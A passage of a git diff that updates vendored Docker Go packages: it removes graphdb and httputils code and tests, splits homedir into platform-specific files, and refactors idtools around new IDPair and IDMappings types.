-	db.Set("/webapp/db", "2")
-
-	count, err := db.Purge("2")
-	if err != nil {
-		t.Fatal(err)
-	}
-	if count != 2 {
-		t.Fatalf("Expected 2 references to be removed, got %d", count)
-	}
-}
-
-// Regression test https://github.com/docker/docker/issues/12334
-func TestPurgeIdRefPaths(t *testing.T) {
-	// TODO Windows: Port this test
-	if runtime.GOOS == "windows" {
-		t.Skip("Needs porting to Windows")
-	}
-	db, dbpath := newTestDb(t)
-	defer destroyTestDb(dbpath)
-
-	db.Set("/webapp", "1")
-	db.Set("/db", "2")
-
-	db.Set("/db/webapp", "1")
-
-	if c := db.Refs("1"); c != 2 {
-		t.Fatalf("Expected 2 reference for webapp, got %d", c)
-	}
-	if c := db.Refs("2"); c != 1 {
-		t.Fatalf("Expected 1 reference for db, got %d", c)
-	}
-
-	if rp := db.RefPaths("2"); len(rp) != 1 {
-		t.Fatalf("Expected 1 reference path for db, got %d", len(rp))
-	}
-
-	count, err := db.Purge("2")
-	if err != nil {
-		t.Fatal(err)
-	}
-
-	if count != 2 {
-		t.Fatalf("Expected 2 rows to be removed, got %d", count)
-	}
-
-	if c := db.Refs("2"); c != 0 {
-		t.Fatalf("Expected 0 reference for db, got %d", c)
-	}
-	if c := db.Refs("1"); c != 1 {
-		t.Fatalf("Expected 1 reference for webapp, got %d", c)
-	}
-}
-
-func TestRename(t *testing.T) {
-	// TODO Windows: Port this test
-	if runtime.GOOS == "windows" {
-		t.Skip("Needs porting to Windows")
-	}
-	db, dbpath := newTestDb(t)
-	defer destroyTestDb(dbpath)
-
-	db.Set("/webapp", "1")
-
-	if db.Refs("1") != 1 {
-		t.Fatal("Expect reference count to be 1")
-	}
-
-	db.Set("/db", "2")
-	db.Set("/webapp/db", "2")
-
-	if db.Get("/webapp/db") == nil {
-		t.Fatal("Cannot find entity at path /webapp/db")
-	}
-
-	if err := db.Rename("/webapp/db", "/webapp/newdb"); err != nil {
-		t.Fatal(err)
-	}
-	if db.Get("/webapp/db") != nil {
-		t.Fatal("Entity should not exist at /webapp/db")
-	}
-	if db.Get("/webapp/newdb") == nil {
-		t.Fatal("Cannot find entity at path /webapp/newdb")
-	}
-
-}
-
-func TestCreateMultipleNames(t *testing.T) {
-	// TODO Windows: Port this test
-	if runtime.GOOS == "windows" {
-		t.Skip("Needs porting to Windows")
-	}
-
-	db, dbpath := newTestDb(t)
-	defer destroyTestDb(dbpath)
-
-	db.Set("/db", "1")
-	if _, err := db.Set("/myapp", "1"); err != nil {
-		t.Fatal(err)
-	}
-
-	db.Walk("/", func(p string, e *Entity) error {
-		t.Logf("%s\n", p)
-		return nil
-	}, -1)
-}
-
-func TestRefPaths(t *testing.T) {
-	db, dbpath := newTestDb(t)
-	defer destroyTestDb(dbpath)
-
-	db.Set("/webapp", "1")
-
-	db.Set("/db", "2")
-	db.Set("/webapp/db", "2")
-
-	refs := db.RefPaths("2")
-	if len(refs) != 2 {
-		t.Fatalf("Expected reference count to be 2, got %d", len(refs))
-	}
-}
-
-func TestExistsTrue(t *testing.T) {
-	db, dbpath := newTestDb(t)
-	defer destroyTestDb(dbpath)
-
-	db.Set("/testing", "1")
-
-	if !db.Exists("/testing") {
-		t.Fatalf("/tesing should exist")
-	}
-}
-
-func TestExistsFalse(t *testing.T) {
-	// TODO Windows: Port this test
-	if runtime.GOOS == "windows" {
-		t.Skip("Needs porting to Windows")
-	}
-	db, dbpath := newTestDb(t)
-	defer destroyTestDb(dbpath)
-
-	db.Set("/toerhe", "1")
-
-	if db.Exists("/testing") {
-		t.Fatalf("/tesing should not exist")
-	}
-
-}
-
-func TestGetNameWithTrailingSlash(t *testing.T) {
-	db, dbpath := newTestDb(t)
-	defer destroyTestDb(dbpath)
-
-	db.Set("/todo", "1")
-
-	e := db.Get("/todo/")
-	if e == nil {
-		t.Fatalf("Entity should not be nil")
-	}
-}
-
-func TestConcurrentWrites(t *testing.T) {
-	// TODO Windows: Port this test
-	if runtime.GOOS == "windows" {
-		t.Skip("Needs porting to Windows")
-	}
-	db, dbpath := newTestDb(t)
-	defer destroyTestDb(dbpath)
-
-	errs := make(chan error, 2)
-
-	save := func(name string, id string) {
-		if _, err := db.Set(fmt.Sprintf("/%s", name), id); err != nil {
-			errs <- err
-		}
-		errs <- nil
-	}
-	purge := func(id string) {
-		if _, err := db.Purge(id); err != nil {
-			errs <- err
-		}
-		errs <- nil
-	}
-
-	save("/1", "1")
-
-	go purge("1")
-	go save("/2", "2")
-
-	any := false
-	for i := 0; i < 2; i++ {
-		if err := <-errs; err != nil {
-			any = true
-			t.Log(err)
-		}
-	}
-	if any {
-		t.Fail()
-	}
-}
diff --git a/vendor/github.com/docker/docker/pkg/graphdb/sort_linux.go b/vendor/github.com/docker/docker/pkg/graphdb/sort_linux.go
deleted file mode 100644
index c07df077d8..0000000000
--- a/vendor/github.com/docker/docker/pkg/graphdb/sort_linux.go
+++ /dev/null
@@ -1,27 +0,0 @@
-package graphdb
-
-import "sort"
-
-type pathSorter struct {
-	paths []string
-	by    func(i, j string) bool
-}
-
-func sortByDepth(paths []string) {
-	s := &pathSorter{paths, func(i, j string) bool {
-		return PathDepth(i) > PathDepth(j)
-	}}
-	sort.Sort(s)
-}
-
-func (s *pathSorter) Len() int {
-	return len(s.paths)
-}
-
-func (s *pathSorter) Swap(i, j int) {
-	s.paths[i], s.paths[j] = s.paths[j], s.paths[i]
-}
-
-func (s *pathSorter) Less(i, j int) bool {
-	return s.by(s.paths[i], s.paths[j])
-}
diff --git a/vendor/github.com/docker/docker/pkg/graphdb/sort_linux_test.go b/vendor/github.com/docker/docker/pkg/graphdb/sort_linux_test.go
deleted file mode 100644
index ddf2266f60..0000000000
--- a/vendor/github.com/docker/docker/pkg/graphdb/sort_linux_test.go
+++ /dev/null
@@ -1,29 +0,0 @@
-package graphdb
-
-import (
-	"testing"
-)
-
-func TestSort(t *testing.T) {
-	paths := []string{
-		"/",
-		"/myreallylongname",
-		"/app/db",
-	}
-
-	sortByDepth(paths)
-
-	if len(paths) != 3 {
-		t.Fatalf("Expected 3 parts got %d", len(paths))
-	}
-
-	if paths[0] != "/app/db" {
-		t.Fatalf("Expected /app/db got %s", paths[0])
-	}
-	if paths[1] != "/myreallylongname" {
-		t.Fatalf("Expected /myreallylongname got %s", paths[1])
-	}
-	if paths[2] != "/" {
-		t.Fatalf("Expected / got %s", paths[2])
-	}
-}
diff --git a/vendor/github.com/docker/docker/pkg/graphdb/unsupported.go b/vendor/github.com/docker/docker/pkg/graphdb/unsupported.go
deleted file mode 100644
index 2b8ba71724..0000000000
--- a/vendor/github.com/docker/docker/pkg/graphdb/unsupported.go
+++ /dev/null
@@ -1,3 +0,0 @@
-// +build !cgo !linux
-
-package graphdb
diff --git a/vendor/github.com/docker/docker/pkg/graphdb/utils_linux.go b/vendor/github.com/docker/docker/pkg/graphdb/utils_linux.go
deleted file mode 100644
index 9edd79c35e..0000000000
--- a/vendor/github.com/docker/docker/pkg/graphdb/utils_linux.go
+++ /dev/null
@@ -1,32 +0,0 @@
-package graphdb
-
-import (
-	"path"
-	"strings"
-)
-
-// Split p on /
-func split(p string) []string {
-	return strings.Split(p, "/")
-}
-
-// PathDepth returns the depth or number of / in a given path
-func PathDepth(p string) int {
-	parts := split(p)
-	if len(parts) == 2 && parts[1] == "" {
-		return 1
-	}
-	return len(parts)
-}
-
-func splitPath(p string) (parent, name string) {
-	if p[0] != '/' {
-		p = "/" + p
-	}
-	parent, name = path.Split(p)
-	l := len(parent)
-	if parent[l-1] == '/' {
-		parent = parent[:l-1]
-	}
-	return
-}
diff --git a/vendor/github.com/docker/docker/pkg/homedir/homedir_linux.go b/vendor/github.com/docker/docker/pkg/homedir/homedir_linux.go
new file mode 100644
index 0000000000..ee15ed52b1
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/homedir/homedir_linux.go
@@ -0,0 +1,21 @@
+package homedir // import "github.com/docker/docker/pkg/homedir"
+
+import (
+	"os"
+
+	"github.com/docker/docker/pkg/idtools"
+)
+
+// GetStatic returns the home directory for the current user without calling
+// os/user.Current(). This is useful for static-linked binary on glibc-based
+// system, because a call to os/user.Current() in a static binary leads to
+// segfault due to a glibc issue that won't be fixed in a short term.
+// (#29344, golang/go#13470, https://sourceware.org/bugzilla/show_bug.cgi?id=19341)
+func GetStatic() (string, error) {
+	uid := os.Getuid()
+	usr, err := idtools.LookupUID(uid)
+	if err != nil {
+		return "", err
+	}
+	return usr.Home, nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/homedir/homedir_others.go b/vendor/github.com/docker/docker/pkg/homedir/homedir_others.go
new file mode 100644
index 0000000000..75ada2fe54
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/homedir/homedir_others.go
@@ -0,0 +1,13 @@
+// +build !linux
+
+package homedir // import "github.com/docker/docker/pkg/homedir"
+
+import (
+	"errors"
+)
+
+// GetStatic is not needed for non-linux systems.
+// (Precisely, it is needed only for glibc-based linux systems.)
+func GetStatic() (string, error) {
+	return "", errors.New("homedir.GetStatic() is not supported on this system")
+}
diff --git a/vendor/github.com/docker/docker/pkg/homedir/homedir_test.go b/vendor/github.com/docker/docker/pkg/homedir/homedir_test.go
index 7a95cb2bd7..49c42224fd 100644
--- a/vendor/github.com/docker/docker/pkg/homedir/homedir_test.go
+++ b/vendor/github.com/docker/docker/pkg/homedir/homedir_test.go
@@ -1,4 +1,4 @@
-package homedir
+package homedir // import "github.com/docker/docker/pkg/homedir"
 
 import (
 	"path/filepath"
diff --git a/vendor/github.com/docker/docker/pkg/homedir/homedir.go b/vendor/github.com/docker/docker/pkg/homedir/homedir_unix.go
similarity index 75%
rename from vendor/github.com/docker/docker/pkg/homedir/homedir.go
rename to vendor/github.com/docker/docker/pkg/homedir/homedir_unix.go
index 8154e83f0c..d85e124488 100644
--- a/vendor/github.com/docker/docker/pkg/homedir/homedir.go
+++ b/vendor/github.com/docker/docker/pkg/homedir/homedir_unix.go
@@ -1,8 +1,9 @@
-package homedir
+// +build !windows
+
+package homedir // import "github.com/docker/docker/pkg/homedir"
 
 import (
 	"os"
-	"runtime"
 
 	"github.com/opencontainers/runc/libcontainer/user"
 )
@@ -10,9 +11,6 @@ import (
 // Key returns the env var name for the user's home dir based on
 // the platform being run on
 func Key() string {
-	if runtime.GOOS == "windows" {
-		return "USERPROFILE"
-	}
 	return "HOME"
 }
 
@@ -21,7 +19,7 @@ func Key() string {
 // Returned path should be used with "path/filepath" to form new paths.
 func Get() string {
 	home := os.Getenv(Key())
-	if home == "" && runtime.GOOS != "windows" {
+	if home == "" {
 		if u, err := user.CurrentUser(); err == nil {
 			return u.Home
 		}
@@ -32,8 +30,5 @@ func Get() string {
 // GetShortcutString returns the string that is shortcut to user's home directory
 // in the native shell of the platform running on.
 func GetShortcutString() string {
-	if runtime.GOOS == "windows" {
-		return "%USERPROFILE%" // be careful while using in format functions
-	}
 	return "~"
 }
diff --git a/vendor/github.com/docker/docker/pkg/homedir/homedir_windows.go b/vendor/github.com/docker/docker/pkg/homedir/homedir_windows.go
new file mode 100644
index 0000000000..2f81813b28
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/homedir/homedir_windows.go
@@ -0,0 +1,24 @@
+package homedir // import "github.com/docker/docker/pkg/homedir"
+
+import (
+	"os"
+)
+
+// Key returns the env var name for the user's home dir based on
+// the platform being run on
+func Key() string {
+	return "USERPROFILE"
+}
+
+// Get returns the home directory of the current user with the help of
+// environment variables depending on the target operating system.
+// Returned path should be used with "path/filepath" to form new paths.
+func Get() string {
+	return os.Getenv(Key())
+}
+
+// GetShortcutString returns the string that is shortcut to user's home directory
+// in the native shell of the platform running on.
+func GetShortcutString() string {
+	return "%USERPROFILE%" // be careful while using in format functions
+}
diff --git a/vendor/github.com/docker/docker/pkg/httputils/httputils.go b/vendor/github.com/docker/docker/pkg/httputils/httputils.go
deleted file mode 100644
index d7dc43877d..0000000000
--- a/vendor/github.com/docker/docker/pkg/httputils/httputils.go
+++ /dev/null
@@ -1,56 +0,0 @@
-package httputils
-
-import (
-	"errors"
-	"fmt"
-	"net/http"
-	"regexp"
-	"strings"
-
-	"github.com/docker/docker/pkg/jsonmessage"
-)
-
-var (
-	headerRegexp     = regexp.MustCompile(`^(?:(.+)/(.+?))\((.+)\).*$`)
-	errInvalidHeader = errors.New("Bad header, should be in format `docker/version (platform)`")
-)
-
-// Download requests a given URL and returns an io.Reader.
-func Download(url string) (resp *http.Response, err error) {
-	if resp, err = http.Get(url); err != nil {
-		return nil, err
-	}
-	if resp.StatusCode >= 400 {
-		return nil, fmt.Errorf("Got HTTP status code >= 400: %s", resp.Status)
-	}
-	return resp, nil
-}
-
-// NewHTTPRequestError returns a JSON response error.
-func NewHTTPRequestError(msg string, res *http.Response) error {
-	return &jsonmessage.JSONError{
-		Message: msg,
-		Code:    res.StatusCode,
-	}
-}
-
-// ServerHeader contains the server information.
-type ServerHeader struct {
-	App string // docker
-	Ver string // 1.8.0-dev
-	OS  string // windows or linux
-}
-
-// ParseServerHeader extracts pieces from an HTTP server header
-// which is in the format "docker/version (os)" eg docker/1.8.0-dev (windows).
-func ParseServerHeader(hdr string) (*ServerHeader, error) {
-	matches := headerRegexp.FindStringSubmatch(hdr)
-	if len(matches) != 4 {
-		return nil, errInvalidHeader
-	}
-	return &ServerHeader{
-		App: strings.TrimSpace(matches[1]),
-		Ver: strings.TrimSpace(matches[2]),
-		OS:  strings.TrimSpace(matches[3]),
-	}, nil
-}
diff --git a/vendor/github.com/docker/docker/pkg/httputils/httputils_test.go b/vendor/github.com/docker/docker/pkg/httputils/httputils_test.go
deleted file mode 100644
index d35d082156..0000000000
--- a/vendor/github.com/docker/docker/pkg/httputils/httputils_test.go
+++ /dev/null
@@ -1,115 +0,0 @@
-package httputils
-
-import (
-	"fmt"
-	"io/ioutil"
-	"net/http"
-	"net/http/httptest"
-	"strings"
-	"testing"
-)
-
-func TestDownload(t *testing.T) {
-	expected := "Hello, docker !"
-	ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
-		fmt.Fprintf(w, expected)
-	}))
-	defer ts.Close()
-	response, err := Download(ts.URL)
-	if err != nil {
-		t.Fatal(err)
-	}
-
-	actual, err := ioutil.ReadAll(response.Body)
-	response.Body.Close()
-
-	if err != nil || string(actual) != expected {
-		t.Fatalf("Expected the response %q, got err:%v, response:%v, actual:%s", expected, err, response, string(actual))
-	}
-}
-
-func TestDownload400Errors(t *testing.T) {
-	expectedError := "Got HTTP status code >= 400: 403 Forbidden"
-	ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
-		// 403
-		http.Error(w, "something failed (forbidden)", http.StatusForbidden)
-	}))
-	defer ts.Close()
-	// Expected status code = 403
-	if _, err := Download(ts.URL); err == nil || err.Error() != expectedError {
-		t.Fatalf("Expected the the error %q, got %v", expectedError, err)
-	}
-}
-
-func TestDownloadOtherErrors(t *testing.T) {
-	if _, err := Download("I'm not an url.."); err == nil || !strings.Contains(err.Error(), "unsupported protocol scheme") {
-		t.Fatalf("Expected an error with 'unsupported protocol scheme', got %v", err)
-	}
-}
-
-func TestNewHTTPRequestError(t *testing.T) {
-	errorMessage := "Some error message"
-	ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
-		// 403
-		http.Error(w, errorMessage, http.StatusForbidden)
-	}))
-	defer ts.Close()
-	httpResponse, err := http.Get(ts.URL)
-	if err != nil {
-		t.Fatal(err)
-	}
-	if err := NewHTTPRequestError(errorMessage, httpResponse); err.Error() != errorMessage {
-		t.Fatalf("Expected err to be %q, got %v", errorMessage, err)
-	}
-}
-
-func TestParseServerHeader(t *testing.T) {
-	inputs := map[string][]string{
-		"bad header":           {"error"},
-		"(bad header)":         {"error"},
-		"(without/spaces)":     {"error"},
-		"(header/with spaces)": {"error"},
-		"foo/bar (baz)":        {"foo", "bar", "baz"},
-		"foo/bar":              {"error"},
-		"foo":                  {"error"},
-		"foo/bar (baz space)":           {"foo", "bar", "baz space"},
-		"  f  f  /  b  b  (  b  s  )  ": {"f  f", "b  b", "b  s"},
-		"foo/bar (baz) ignore":          {"foo", "bar", "baz"},
-		"foo/bar ()":                    {"error"},
-		"foo/bar()":                     {"error"},
-		"foo/bar(baz)":                  {"foo", "bar", "baz"},
-		"foo/bar/zzz(baz)":              {"foo/bar", "zzz", "baz"},
-		"foo/bar(baz/abc)":              {"foo", "bar", "baz/abc"},
-		"foo/bar(baz (abc))":            {"foo", "bar", "baz (abc)"},
-	}
-
-	for header, values := range inputs {
-		serverHeader, err := ParseServerHeader(header)
-		if err != nil {
-			if err != errInvalidHeader {
-				t.Fatalf("Failed to parse %q, and got some unexpected error: %q", header, err)
-			}
-			if values[0] == "error" {
-				continue
-			}
-			t.Fatalf("Header %q failed to parse when it shouldn't have", header)
-		}
-		if values[0] == "error" {
-			t.Fatalf("Header %q parsed ok when it should have failed(%q).", header, serverHeader)
-		}
-
-		if serverHeader.App != values[0] {
-			t.Fatalf("Expected serverHeader.App for %q to equal %q, got %q", header, values[0], serverHeader.App)
-		}
-
-		if serverHeader.Ver != values[1] {
-			t.Fatalf("Expected serverHeader.Ver for %q to equal %q, got %q", header, values[1], serverHeader.Ver)
-		}
-
-		if serverHeader.OS != values[2] {
-			t.Fatalf("Expected serverHeader.OS for %q to equal %q, got %q", header, values[2], serverHeader.OS)
-		}
-
-	}
-
-}
diff --git a/vendor/github.com/docker/docker/pkg/httputils/mimetype_test.go b/vendor/github.com/docker/docker/pkg/httputils/mimetype_test.go
deleted file mode 100644
index 9de433ee8c..0000000000
--- a/vendor/github.com/docker/docker/pkg/httputils/mimetype_test.go
+++ /dev/null
@@ -1,13 +0,0 @@
-package httputils
-
-import (
-	"testing"
-)
-
-func TestDetectContentType(t *testing.T) {
-	input := []byte("That is just a plain text")
-
-	if contentType, _, err := DetectContentType(input); err != nil || contentType != "text/plain" {
-		t.Errorf("TestDetectContentType failed")
-	}
-}
diff --git a/vendor/github.com/docker/docker/pkg/idtools/idtools.go b/vendor/github.com/docker/docker/pkg/idtools/idtools.go
index 6bca466286..d1f173a311 100644
--- a/vendor/github.com/docker/docker/pkg/idtools/idtools.go
+++ b/vendor/github.com/docker/docker/pkg/idtools/idtools.go
@@ -1,4 +1,4 @@
-package idtools
+package idtools // import "github.com/docker/docker/pkg/idtools"
 
 import (
 	"bufio"
@@ -30,56 +30,50 @@ func (e ranges) Swap(i, j int)      { e[i], e[j] = e[j], e[i] }
 func (e ranges) Less(i, j int) bool { return e[i].Start < e[j].Start }
 
 const (
-	subuidFileName string = "/etc/subuid"
-	subgidFileName string = "/etc/subgid"
+	subuidFileName = "/etc/subuid"
+	subgidFileName = "/etc/subgid"
 )
 
-// MkdirAllAs creates a directory (include any along the path) and then modifies
+// MkdirAllAndChown creates a directory (include any along the path) and then modifies
 // ownership to the requested uid/gid.  If the directory already exists, this
 // function will still change ownership to the requested uid/gid pair.
-func MkdirAllAs(path string, mode os.FileMode, ownerUID, ownerGID int) error {
-	return mkdirAs(path, mode, ownerUID, ownerGID, true, true)
+func MkdirAllAndChown(path string, mode os.FileMode, owner IDPair) error {
+	return mkdirAs(path, mode, owner.UID, owner.GID, true, true)
 }
 
-// MkdirAllNewAs creates a directory (include any along the path) and then modifies
-// ownership ONLY of newly created directories to the requested uid/gid. If the
-// directories along the path exist, no change of ownership will be performed
-func MkdirAllNewAs(path string, mode os.FileMode, ownerUID, ownerGID int) error {
-	return mkdirAs(path, mode, ownerUID, ownerGID, true, false)
+// MkdirAndChown creates a directory and then modifies ownership to the requested uid/gid.
+// If the directory already exists, this function still changes ownership.
+// Note that unlike os.Mkdir(), this function does not return IsExist error
+// in case path already exists.
+func MkdirAndChown(path string, mode os.FileMode, owner IDPair) error {
+	return mkdirAs(path, mode, owner.UID, owner.GID, false, true)
 }
 
-// MkdirAs creates a directory and then modifies ownership to the requested uid/gid.
-// If the directory already exists, this function still changes ownership
-func MkdirAs(path string, mode os.FileMode, ownerUID, ownerGID int) error {
-	return mkdirAs(path, mode, ownerUID, ownerGID, false, true)
+// MkdirAllAndChownNew creates a directory (include any along the path) and then modifies
+// ownership ONLY of newly created directories to the requested uid/gid. If the
+// directories along the path exist, no change of ownership will be performed
+func MkdirAllAndChownNew(path string, mode os.FileMode, owner IDPair) error {
+	return mkdirAs(path, mode, owner.UID, owner.GID, true, false)
 }
 
 // GetRootUIDGID retrieves the remapped root uid/gid pair from the set of maps.
 // If the maps are empty, then the root uid/gid will default to "real" 0/0
 func GetRootUIDGID(uidMap, gidMap []IDMap) (int, int, error) {
-	var uid, gid int
-
-	if uidMap != nil {
-		xUID, err := ToHost(0, uidMap)
-		if err != nil {
-			return -1, -1, err
-		}
-		uid = xUID
+	uid, err := toHost(0, uidMap)
+	if err != nil {
+		return -1, -1, err
 	}
-	if gidMap != nil {
-		xGID, err := ToHost(0, gidMap)
-		if err != nil {
-			return -1, -1, err
-		}
-		gid = xGID
+	gid, err := toHost(0, gidMap)
+	if err != nil {
+		return -1, -1, err
 	}
 	return uid, gid, nil
 }
 
-// ToContainer takes an id mapping, and uses it to translate a
+// toContainer takes an id mapping, and uses it to translate a
 // host ID to the remapped ID. If no map is provided, then the translation
 // assumes a 1-to-1 mapping and returns the passed in id
-func ToContainer(hostID int, idMap []IDMap) (int, error) {
+func toContainer(hostID int, idMap []IDMap) (int, error) {
 	if idMap == nil {
 		return hostID, nil
 	}
@@ -92,10 +86,10 @@ func ToContainer(hostID int, idMap []IDMap) (int, error) {
 	return -1, fmt.Errorf("Host ID %d cannot be mapped to a container ID", hostID)
 }
 
-// ToHost takes an id mapping and a remapped ID, and translates the
+// toHost takes an id mapping and a remapped ID, and translates the
 // ID to the mapped host ID. If no map is provided, then the translation
 // assumes a 1-to-1 mapping and returns the passed in id #
-func ToHost(contID int, idMap []IDMap) (int, error) {
+func toHost(contID int, idMap []IDMap) (int, error) {
 	if idMap == nil {
 		return contID, nil
 	}
@@ -108,26 +102,101 @@ func ToHost(contID int, idMap []IDMap) (int, error) {
 	return -1, fmt.Errorf("Container ID %d cannot be mapped to a host ID", contID)
 }
 
-// CreateIDMappings takes a requested user and group name and
+// IDPair is a UID and GID pair
+type IDPair struct {
+	UID int
+	GID int
+}
+
+// IDMappings contains a mappings of UIDs and GIDs
+type IDMappings struct {
+	uids []IDMap
+	gids []IDMap
+}
+
+// NewIDMappings takes a requested user and group name and
 // using the data from /etc/sub{uid,gid} ranges, creates the
 // proper uid and gid remapping ranges for that user/group pair
-func CreateIDMappings(username, groupname string) ([]IDMap, []IDMap, error) {
+func NewIDMappings(username, groupname string) (*IDMappings, error) {
 	subuidRanges, err := parseSubuid(username)
 	if err != nil {
-		return nil, nil, err
+		return nil, err
 	}
 	subgidRanges, err := parseSubgid(groupname)
 	if err != nil {
-		return nil, nil, err
+		return nil, err
 	}
 	if len(subuidRanges) == 0 {
-		return nil, nil, fmt.Errorf("No subuid ranges found for user %q", username)
+		return nil, fmt.Errorf("No subuid ranges found for user %q", username)
 	}
 	if len(subgidRanges) == 0 {
-		return nil, nil, fmt.Errorf("No subgid ranges found for group %q", groupname)
+		return nil, fmt.Errorf("No subgid ranges found for group %q", groupname)
 	}
 
-	return createIDMap(subuidRanges), createIDMap(subgidRanges), nil
+	return &IDMappings{
+		uids: createIDMap(subuidRanges),
+		gids: createIDMap(subgidRanges),
+	}, nil
+}
+
+// NewIDMappingsFromMaps creates a new mapping from two slices
+// Deprecated: this is a temporary shim while transitioning to IDMapping
+func NewIDMappingsFromMaps(uids []IDMap, gids []IDMap) *IDMappings {
+	return &IDMappings{uids: uids, gids: gids}
+}
+
+// RootPair returns a uid and gid pair for the root user. The error is ignored
+// because a root user always exists, and the defaults are correct when the uid
+// and gid maps are empty.
+func (i *IDMappings) RootPair() IDPair {
+	uid, gid, _ := GetRootUIDGID(i.uids, i.gids)
+	return IDPair{UID: uid, GID: gid}
+}
+
+// ToHost returns the host UID and GID for the container uid, gid.
+// Remapping is only performed if the ids aren't already the remapped root ids
+func (i *IDMappings) ToHost(pair IDPair) (IDPair, error) {
+	var err error
+	target := i.RootPair()
+
+	if pair.UID != target.UID {
+		target.UID, err = toHost(pair.UID, i.uids)
+		if err != nil {
+			return target, err
+		}
+	}
+
+	if pair.GID != target.GID {
+		target.GID, err = toHost(pair.GID, i.gids)
+	}
+	return target, err
+}
+
+// ToContainer returns the container UID and GID for the host uid and gid
+func (i *IDMappings) ToContainer(pair IDPair) (int, int, error) {
+	uid, err := toContainer(pair.UID, i.uids)
+	if err != nil {
+		return -1, -1, err
+	}
+	gid, err := toContainer(pair.GID, i.gids)
+	return uid, gid, err
+}
+
+// Empty returns true if there are no id mappings
+func (i *IDMappings) Empty() bool {
+	return len(i.uids) == 0 && len(i.gids) == 0
+}
+
+// UIDs return the UID mapping
+// TODO: remove this once everything has been refactored to use pairs
+func (i *IDMappings) UIDs() []IDMap {
+	return i.uids
+}
+
+// GIDs return the UID mapping
+// TODO: remove this once everything has been refactored to use pairs
+func (i *IDMappings) GIDs() []IDMap {
+	return i.gids
 }
 
 func createIDMap(subidRanges ranges) []IDMap {
diff --git a/vendor/github.com/docker/docker/pkg/idtools/idtools_unix.go b/vendor/github.com/docker/docker/pkg/idtools/idtools_unix.go
index f9eb31c3ec..1d87ea3bcb 100644
--- a/vendor/github.com/docker/docker/pkg/idtools/idtools_unix.go
+++ b/vendor/github.com/docker/docker/pkg/idtools/idtools_unix.go
@@ -1,6 +1,6 @@
 // +build !windows
 
-package idtools
+package idtools // import "github.com/docker/docker/pkg/idtools"
 
 import (
 	"bytes"
@@ -10,6 +10,7 @@ import (
 	"path/filepath"
 	"strings"
 	"sync"
+	"syscall"
 
 	"github.com/docker/docker/pkg/system"
 	"github.com/opencontainers/runc/libcontainer/user"
@@ -26,17 +27,22 @@ func mkdirAs(path string, mode os.FileMode, ownerUID, ownerGID int, mkAll, chown
 	// so that we can chown all of them properly at the end.  If chownExisting is false, we won't
 	// chown the full directory path if it exists
 	var paths []string
-	if _, err := os.Stat(path); err != nil && os.IsNotExist(err) {
-		paths = []string{path}
-	} else if err == nil && chownExisting {
-		if err := os.Chown(path, ownerUID, ownerGID); err != nil {
-			return err
+
+	stat, err := system.Stat(path)
+	if err == nil {
+		if !stat.IsDir() {
+			return &os.PathError{Op: "mkdir", Path: path, Err: syscall.ENOTDIR}
+		}
+		if !chownExisting {
+			return nil
 		}
+
 		// short-circuit--we were called with an existing directory and chown was requested
-		return nil
-	} else if err == nil {
-		// nothing to do; directory path fully exists already and chown was NOT requested
-		return nil
+		return lazyChown(path, ownerUID, ownerGID, stat)
+	}
+
+	if os.IsNotExist(err) {
+		paths = []string{path}
 	}
 
 	if mkAll {
@@ -52,7 +58,7 @@ func mkdirAs(path string, mode os.FileMode, ownerUID, ownerGID int, mkAll, chown
 				paths = append(paths, dirPath)
 			}
 		}
-		if err := system.MkdirAll(path, mode); err != nil && !os.IsExist(err) {
+		if err := system.MkdirAll(path, mode, ""); err != nil {
 			return err
 		}
 	} else {
@@ -63,7 +69,7 @@ func mkdirAs(path string, mode os.FileMode, ownerUID, ownerGID int, mkAll, chown
 	// even if it existed, we will chown the requested path + any subpaths that
 	// didn't exist when we called MkdirAll
 	for _, pathComponent := range paths {
-		if err := os.Chown(pathComponent, ownerUID, ownerGID); err != nil {
+		if err := lazyChown(pathComponent, ownerUID, ownerGID, nil); err != nil {
 			return err
 		}
 	}
@@ -72,15 +78,15 @@ func mkdirAs(path string, mode os.FileMode, ownerUID, ownerGID int, mkAll, chown
 
 // CanAccess takes a valid (existing) directory and a uid, gid pair and determines
 // if that uid, gid pair has access (execute bit) to the directory
-func CanAccess(path string, uid, gid int) bool {
+func CanAccess(path string, pair IDPair) bool {
 	statInfo, err := system.Stat(path)
 	if err != nil {
 		return false
 	}
 	fileMode := os.FileMode(statInfo.Mode())
 	permBits := fileMode.Perm()
-	return accessible(statInfo.UID() == uint32(uid),
-		statInfo.GID() == uint32(gid), permBits)
+	return accessible(statInfo.UID() == uint32(pair.UID),
+		statInfo.GID() == uint32(pair.GID), permBits)
 }
 
 func accessible(isOwner, isGroup bool, perms os.FileMode) bool {
@@ -205,3 +211,20 @@ func callGetent(args string) (io.Reader, error) {
 	}
 	return bytes.NewReader(out), nil
 }
+
+// lazyChown performs a chown only if the uid/gid don't match what's requested
+// Normally a Chown is a no-op if uid/gid match, but in some cases this can still cause an error, e.g. if the
+// dir is on an NFS share, so don't call chown unless we absolutely must.
+func lazyChown(p string, uid, gid int, stat *system.StatT) error {
+	if stat == nil {
+		var err error
+		stat, err = system.Stat(p)
+		if err != nil {
+			return err
+		}
+	}
+	if stat.UID() == uint32(uid) && stat.GID() == uint32(gid) {
+		return nil
+	}
+	return os.Chown(p, uid, gid)
+}
diff --git a/vendor/github.com/docker/docker/pkg/idtools/idtools_unix_test.go b/vendor/github.com/docker/docker/pkg/idtools/idtools_unix_test.go
index 540d3079ee..608000a66b 100644
--- a/vendor/github.com/docker/docker/pkg/idtools/idtools_unix_test.go
+++ b/vendor/github.com/docker/docker/pkg/idtools/idtools_unix_test.go
@@ -1,14 +1,23 @@
 // +build !windows
 
-package idtools
+package idtools // import "github.com/docker/docker/pkg/idtools"
 
 import (
 	"fmt"
 	"io/ioutil"
 	"os"
+	"os/user"
 	"path/filepath"
-	"syscall"
 	"testing"
+
+	"golang.org/x/sys/unix"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+	"gotest.tools/skip"
+)
+
+const (
+	tempUser = "tempuser"
 )
 
 type node struct {
@@ -16,7 +25,8 @@ type node struct {
 	gid int
 }
 
-func TestMkdirAllAs(t *testing.T) {
+func TestMkdirAllAndChown(t *testing.T) {
